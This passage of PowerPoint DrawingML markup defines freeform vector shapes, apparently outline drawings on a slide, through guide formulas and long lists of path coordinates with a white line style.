                  <a:gd name="T16" fmla="*/ 79 w 104"/>
                  <a:gd name="T17" fmla="*/ 14 h 104"/>
                  <a:gd name="T18" fmla="*/ 70 w 104"/>
                  <a:gd name="T19" fmla="*/ 16 h 104"/>
                  <a:gd name="T20" fmla="*/ 62 w 104"/>
                  <a:gd name="T21" fmla="*/ 19 h 104"/>
                  <a:gd name="T22" fmla="*/ 56 w 104"/>
                  <a:gd name="T23" fmla="*/ 19 h 104"/>
                  <a:gd name="T24" fmla="*/ 67 w 104"/>
                  <a:gd name="T25" fmla="*/ 31 h 104"/>
                  <a:gd name="T26" fmla="*/ 61 w 104"/>
                  <a:gd name="T27" fmla="*/ 27 h 104"/>
                  <a:gd name="T28" fmla="*/ 57 w 104"/>
                  <a:gd name="T29" fmla="*/ 28 h 104"/>
                  <a:gd name="T30" fmla="*/ 61 w 104"/>
                  <a:gd name="T31" fmla="*/ 33 h 104"/>
                  <a:gd name="T32" fmla="*/ 53 w 104"/>
                  <a:gd name="T33" fmla="*/ 29 h 104"/>
                  <a:gd name="T34" fmla="*/ 50 w 104"/>
                  <a:gd name="T35" fmla="*/ 30 h 104"/>
                  <a:gd name="T36" fmla="*/ 54 w 104"/>
                  <a:gd name="T37" fmla="*/ 34 h 104"/>
                  <a:gd name="T38" fmla="*/ 52 w 104"/>
                  <a:gd name="T39" fmla="*/ 35 h 104"/>
                  <a:gd name="T40" fmla="*/ 48 w 104"/>
                  <a:gd name="T41" fmla="*/ 29 h 104"/>
                  <a:gd name="T42" fmla="*/ 44 w 104"/>
                  <a:gd name="T43" fmla="*/ 22 h 104"/>
                  <a:gd name="T44" fmla="*/ 38 w 104"/>
                  <a:gd name="T45" fmla="*/ 24 h 104"/>
                  <a:gd name="T46" fmla="*/ 39 w 104"/>
                  <a:gd name="T47" fmla="*/ 33 h 104"/>
                  <a:gd name="T48" fmla="*/ 43 w 104"/>
                  <a:gd name="T49" fmla="*/ 42 h 104"/>
                  <a:gd name="T50" fmla="*/ 47 w 104"/>
                  <a:gd name="T51" fmla="*/ 53 h 104"/>
                  <a:gd name="T52" fmla="*/ 45 w 104"/>
                  <a:gd name="T53" fmla="*/ 48 h 104"/>
                  <a:gd name="T54" fmla="*/ 43 w 104"/>
                  <a:gd name="T55" fmla="*/ 51 h 104"/>
                  <a:gd name="T56" fmla="*/ 40 w 104"/>
                  <a:gd name="T57" fmla="*/ 58 h 104"/>
                  <a:gd name="T58" fmla="*/ 48 w 104"/>
                  <a:gd name="T59" fmla="*/ 61 h 104"/>
                  <a:gd name="T60" fmla="*/ 54 w 104"/>
                  <a:gd name="T61" fmla="*/ 65 h 104"/>
                  <a:gd name="T62" fmla="*/ 61 w 104"/>
                  <a:gd name="T63" fmla="*/ 71 h 104"/>
                  <a:gd name="T64" fmla="*/ 61 w 104"/>
                  <a:gd name="T65" fmla="*/ 81 h 104"/>
                  <a:gd name="T66" fmla="*/ 55 w 104"/>
                  <a:gd name="T67" fmla="*/ 75 h 104"/>
                  <a:gd name="T68" fmla="*/ 46 w 104"/>
                  <a:gd name="T69" fmla="*/ 76 h 104"/>
                  <a:gd name="T70" fmla="*/ 47 w 104"/>
                  <a:gd name="T71" fmla="*/ 82 h 104"/>
                  <a:gd name="T72" fmla="*/ 51 w 104"/>
                  <a:gd name="T73" fmla="*/ 84 h 104"/>
                  <a:gd name="T74" fmla="*/ 48 w 104"/>
                  <a:gd name="T75" fmla="*/ 88 h 104"/>
                  <a:gd name="T76" fmla="*/ 42 w 104"/>
                  <a:gd name="T77" fmla="*/ 84 h 104"/>
                  <a:gd name="T78" fmla="*/ 43 w 104"/>
                  <a:gd name="T79" fmla="*/ 91 h 104"/>
                  <a:gd name="T80" fmla="*/ 41 w 104"/>
                  <a:gd name="T81" fmla="*/ 100 h 104"/>
                  <a:gd name="T82" fmla="*/ 30 w 104"/>
                  <a:gd name="T83" fmla="*/ 95 h 104"/>
                  <a:gd name="T84" fmla="*/ 24 w 104"/>
                  <a:gd name="T85" fmla="*/ 89 h 104"/>
                  <a:gd name="T86" fmla="*/ 18 w 104"/>
                  <a:gd name="T87" fmla="*/ 79 h 104"/>
                  <a:gd name="T88" fmla="*/ 29 w 104"/>
                  <a:gd name="T89" fmla="*/ 70 h 104"/>
                  <a:gd name="T90" fmla="*/ 48 w 104"/>
                  <a:gd name="T91" fmla="*/ 72 h 104"/>
                  <a:gd name="T92" fmla="*/ 28 w 104"/>
                  <a:gd name="T93" fmla="*/ 66 h 104"/>
                  <a:gd name="T94" fmla="*/ 10 w 104"/>
                  <a:gd name="T95" fmla="*/ 58 h 104"/>
                  <a:gd name="T96" fmla="*/ 17 w 104"/>
                  <a:gd name="T97" fmla="*/ 55 h 104"/>
                  <a:gd name="T98" fmla="*/ 2 w 104"/>
                  <a:gd name="T99" fmla="*/ 47 h 104"/>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04"/>
                  <a:gd name="T151" fmla="*/ 0 h 104"/>
                  <a:gd name="T152" fmla="*/ 104 w 104"/>
                  <a:gd name="T153" fmla="*/ 104 h 104"/>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04" h="104">
                    <a:moveTo>
                      <a:pt x="0" y="44"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="44"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36461" name="Freeform 193"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2742" y="2561"/>
                <a:ext cx="250" cy="196"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 250"/>
                  <a:gd name="T1" fmla="*/ 181 h 196"/>
                  <a:gd name="T2" fmla="*/ 23 w 250"/>
                  <a:gd name="T3" fmla="*/ 181 h 196"/>
                  <a:gd name="T4" fmla="*/ 13 w 250"/>
                  <a:gd name="T5" fmla="*/ 175 h 196"/>
                  <a:gd name="T6" fmla="*/ 14 w 250"/>
                  <a:gd name="T7" fmla="*/ 170 h 196"/>
                  <a:gd name="T8" fmla="*/ 13 w 250"/>
                  <a:gd name="T9" fmla="*/ 166 h 196"/>
                  <a:gd name="T10" fmla="*/ 7 w 250"/>
                  <a:gd name="T11" fmla="*/ 161 h 196"/>
                  <a:gd name="T12" fmla="*/ 0 w 250"/>
                  <a:gd name="T13" fmla="*/ 151 h 196"/>
                  <a:gd name="T14" fmla="*/ 2 w 250"/>
                  <a:gd name="T15" fmla="*/ 143 h 196"/>
                  <a:gd name="T16" fmla="*/ 11 w 250"/>
                  <a:gd name="T17" fmla="*/ 144 h 196"/>
                  <a:gd name="T18" fmla="*/ 19 w 250"/>
                  <a:gd name="T19" fmla="*/ 139 h 196"/>
                  <a:gd name="T20" fmla="*/ 33 w 250"/>
                  <a:gd name="T21" fmla="*/ 137 h 196"/>
                  <a:gd name="T22" fmla="*/ 53 w 250"/>
                  <a:gd name="T23" fmla="*/ 136 h 196"/>
                  <a:gd name="T24" fmla="*/ 60 w 250"/>
                  <a:gd name="T25" fmla="*/ 128 h 196"/>
                  <a:gd name="T26" fmla="*/ 64 w 250"/>
                  <a:gd name="T27" fmla="*/ 112 h 196"/>
                  <a:gd name="T28" fmla="*/ 64 w 250"/>
                  <a:gd name="T29" fmla="*/ 98 h 196"/>
                  <a:gd name="T30" fmla="*/ 64 w 250"/>
                  <a:gd name="T31" fmla="*/ 74 h 196"/>
                  <a:gd name="T32" fmla="*/ 89 w 250"/>
                  <a:gd name="T33" fmla="*/ 69 h 196"/>
                  <a:gd name="T34" fmla="*/ 117 w 250"/>
                  <a:gd name="T35" fmla="*/ 44 h 196"/>
                  <a:gd name="T36" fmla="*/ 144 w 250"/>
                  <a:gd name="T37" fmla="*/ 25 h 196"/>
                  <a:gd name="T38" fmla="*/ 185 w 250"/>
                  <a:gd name="T39" fmla="*/ 1 h 196"/>
                  <a:gd name="T40" fmla="*/ 193 w 250"/>
                  <a:gd name="T41" fmla="*/ 1 h 196"/>
                  <a:gd name="T42" fmla="*/ 212 w 250"/>
                  <a:gd name="T43" fmla="*/ 7 h 196"/>
                  <a:gd name="T44" fmla="*/ 222 w 250"/>
                  <a:gd name="T45" fmla="*/ 16 h 196"/>
                  <a:gd name="T46" fmla="*/ 235 w 250"/>
                  <a:gd name="T47" fmla="*/ 9 h 196"/>
                  <a:gd name="T48" fmla="*/ 238 w 250"/>
                  <a:gd name="T49" fmla="*/ 35 h 196"/>
                  <a:gd name="T50" fmla="*/ 245 w 250"/>
                  <a:gd name="T51" fmla="*/ 49 h 196"/>
                  <a:gd name="T52" fmla="*/ 248 w 250"/>
                  <a:gd name="T53" fmla="*/ 59 h 196"/>
                  <a:gd name="T54" fmla="*/ 244 w 250"/>
                  <a:gd name="T55" fmla="*/ 75 h 196"/>
                  <a:gd name="T56" fmla="*/ 244 w 250"/>
                  <a:gd name="T57" fmla="*/ 86 h 196"/>
                  <a:gd name="T58" fmla="*/ 243 w 250"/>
                  <a:gd name="T59" fmla="*/ 100 h 196"/>
                  <a:gd name="T60" fmla="*/ 243 w 250"/>
                  <a:gd name="T61" fmla="*/ 111 h 196"/>
                  <a:gd name="T62" fmla="*/ 221 w 250"/>
                  <a:gd name="T63" fmla="*/ 136 h 196"/>
                  <a:gd name="T64" fmla="*/ 211 w 250"/>
                  <a:gd name="T65" fmla="*/ 152 h 196"/>
                  <a:gd name="T66" fmla="*/ 212 w 250"/>
                  <a:gd name="T67" fmla="*/ 162 h 196"/>
                  <a:gd name="T68" fmla="*/ 205 w 250"/>
                  <a:gd name="T69" fmla="*/ 165 h 196"/>
                  <a:gd name="T70" fmla="*/ 199 w 250"/>
                  <a:gd name="T71" fmla="*/ 168 h 196"/>
                  <a:gd name="T72" fmla="*/ 192 w 250"/>
                  <a:gd name="T73" fmla="*/ 174 h 196"/>
                  <a:gd name="T74" fmla="*/ 182 w 250"/>
                  <a:gd name="T75" fmla="*/ 171 h 196"/>
                  <a:gd name="T76" fmla="*/ 172 w 250"/>
                  <a:gd name="T77" fmla="*/ 169 h 196"/>
                  <a:gd name="T78" fmla="*/ 162 w 250"/>
                  <a:gd name="T79" fmla="*/ 170 h 196"/>
                  <a:gd name="T80" fmla="*/ 154 w 250"/>
                  <a:gd name="T81" fmla="*/ 174 h 196"/>
                  <a:gd name="T82" fmla="*/ 147 w 250"/>
                  <a:gd name="T83" fmla="*/ 178 h 196"/>
                  <a:gd name="T84" fmla="*/ 134 w 250"/>
                  <a:gd name="T85" fmla="*/ 176 h 196"/>
                  <a:gd name="T86" fmla="*/ 123 w 250"/>
                  <a:gd name="T87" fmla="*/ 170 h 196"/>
                  <a:gd name="T88" fmla="*/ 110 w 250"/>
                  <a:gd name="T89" fmla="*/ 175 h 196"/>
                  <a:gd name="T90" fmla="*/ 106 w 250"/>
                  <a:gd name="T91" fmla="*/ 174 h 196"/>
                  <a:gd name="T92" fmla="*/ 92 w 250"/>
                  <a:gd name="T93" fmla="*/ 163 h 196"/>
                  <a:gd name="T94" fmla="*/ 76 w 250"/>
                  <a:gd name="T95" fmla="*/ 163 h 196"/>
                  <a:gd name="T96" fmla="*/ 64 w 250"/>
                  <a:gd name="T97" fmla="*/ 167 h 196"/>
                  <a:gd name="T98" fmla="*/ 56 w 250"/>
                  <a:gd name="T99" fmla="*/ 182 h 196"/>
                  <a:gd name="T100" fmla="*/ 54 w 250"/>
                  <a:gd name="T101" fmla="*/ 196 h 196"/>
                  <a:gd name="T102" fmla="*/ 43 w 250"/>
                  <a:gd name="T103" fmla="*/ 188 h 196"/>
                  <a:gd name="T104" fmla="*/ 38 w 250"/>
                  <a:gd name="T105" fmla="*/ 186 h 19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250"/>
                  <a:gd name="T160" fmla="*/ 0 h 196"/>
                  <a:gd name="T161" fmla="*/ 250 w 250"/>
                  <a:gd name="T162" fmla="*/ 196 h 19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250" h="196">
                    <a:moveTo>
                      <a:pt x="34" y="188"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="30" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
